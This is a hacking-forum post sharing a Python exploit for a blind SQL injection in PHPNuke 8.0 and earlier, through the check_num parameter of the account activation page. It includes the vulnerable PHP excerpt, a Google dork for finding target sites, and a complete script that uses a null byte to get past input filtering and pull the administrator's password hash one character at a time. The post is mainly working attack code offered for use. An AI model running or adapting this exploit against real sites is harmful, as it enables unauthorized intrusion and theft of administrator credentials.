Jump to content
MasT3r ZaTaN

PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulne

By MasT3r ZaTaN, in Exploituri

Recommended Posts

MasT3r ZaTaN Newbie

MasT3r ZaTaN

Posted
Posted 
#!/usr/bin/python
#=================================================================================================#
#                                    This is a Priv8 Exploit.                                     #
#                                  Date: 23/02/2008 [dd,mm,yyyy]                                  #
#                                                                                                 #
#=================================================================================================#
#                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
#                                    Response Analisys Method                                     #
#                                                                                                 #
#                                       Vendor:   [url]http://www.phpnuke.org[/url]                          #
#                                     Severity:   Highest                                         #
#                                       Author:   The:Paradox                                     #
#=================================================================================================#                                                                                                 
#              Server configuration requirments:                                                  #
#                magic_quotes_gpc = 0                                                             #   
#=================================================================================================#                                                                                                 
#                                       Proud To Be Italian.                                      #
#=================================================================================================#
"""                                                                                               
                                            Related Codes:
                    mainfile.php; line 89;

if (!ini_get('register_globals')) {
   @import_request_variables("GPC", "");
}
              /Your_Account/index.php; line 1700;
switch($op) {
//   
   case "activate":
   activate($username, $check_num);
   break;
//   
   }
                                  /Your_Account/index.php; line 161:

function activate($username, $check_num) {
   global $db, $user_prefix, $module_name, $language, $prefix;
   $username = filter($username, "nohtml", 1);
   $past = time()-86400;
   $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
   $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
   echo $sql;   
   $result = $db->sql_query($sql);

"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation:                                                             #
#                                                                                                 #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                                                      #
#                                                                                                 #
#=================================================================================================#
# Google Dork=> Powered by PHPNuke                                                        #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.                              #
#=================================================================================================#
#                                      Python Exploit Starts                                      #
#=================================================================================================#
import httplib, sys, time
print "\n#=========================================================#"
print "             PHPNuke <= 8.0 And Maybe Higher             "
print "          Blind Sql Injection Vulnerability Mq=0         "
print "                Response Analisys Method                 "
print "                                                         "
print "                Discovered By The:Paradox                "         
print "                                                         "
print " Usage:                                                  "
print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                                                         "   
print " Example:                                                "         
print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print " python %s [url]www.host.com[/url] / Andrea                         " % (sys.argv[0])   
print "                                                         "   
print "                                                         "     
print "#=========================================================#\n"
if len(sys.argv)<=3:   sys.exit()
else:   print "[.]Exploit Starting."


target = sys.argv[1]
path = sys.argv[2]


prefix = "nuke_"
port = "80"


j=1
h4sh = ""
md5tuple = []

for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'   
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
   for i in md5tuple:
      if i == 'END':   sys.exit('[-]Exploit Failed.\n')

      conn = httplib.HTTPConnection(target,port)
      conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

      response = conn.getresponse()

      time.sleep(0.5)     
      if response.status == 404: sys.exit('[-]Error 404. Not Found.')     
      if response.read().find("New user verification number is invalid.") != -1:
         sys.stdout.write(chr(i))
         sys.stdout.flush()
         h4sh += chr(i)
         j += 1
         break;

print "\n\n[+]All Done.\n-=Paradoxe=-"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...